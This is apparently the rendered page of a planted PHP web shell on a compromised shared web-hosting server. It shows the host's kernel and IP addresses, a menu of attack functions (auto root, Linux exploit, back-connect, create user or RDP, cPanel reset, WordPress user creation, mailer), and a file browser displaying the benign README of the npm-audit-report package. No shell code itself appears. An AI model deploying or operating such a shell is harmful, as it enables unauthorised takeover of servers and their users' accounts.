Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.224.73.124
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
npm-audit-report /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
reporters
[ DIR ]
drwxr-xr-x
CHANGELOG.md
3.07
KB
-rw-r--r--
LICENSE
755
B
-rw-r--r--
README.md
1.5
KB
-rw-r--r--
index.js
588
B
-rw-r--r--
package.json
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# npm audit security report Given a response from the npm security api, render it into a variety of security reports [![Build Status](https://travis-ci.org/npm/npm-audit-report.svg?branch=master)](https://travis-ci.org/npm/npm-audit-report) [![Build status](https://ci.appveyor.com/api/projects/status/qictiokvxmqkiuvi/branch/master?svg=true)](https://ci.appveyor.com/project/evilpacket/npm-audit-report/branch/master) [![Coverage Status](https://coveralls.io/repos/github/npm/npm-audit-report/badge.svg?branch=master)](https://coveralls.io/github/npm/npm-audit-report?branch=master) The response is an object that contains an output string (the report) and a suggested exitCode. ``` { report: 'string that contains the security report', exit: 1 } ``` ## Basic usage example ``` 'use strict' const Report = require('npm-audit-report') const options = { reporter: 'json' } Report(response, options, (result) => { console.log(result.report) process.exitCode = result.exitCode }) ``` ## options | option | values | default | description | | :--- | :--- | :--- |:--- | | reporter | `install`, `detail`, `json`, `quiet` | `install` | specify which output format you want to use | | withColor | `true`, `false` | `true` | indicates if some report elements should use colors | | withUnicode | `true`, `false` | `true` | indicates if unicode characters should be used|
Close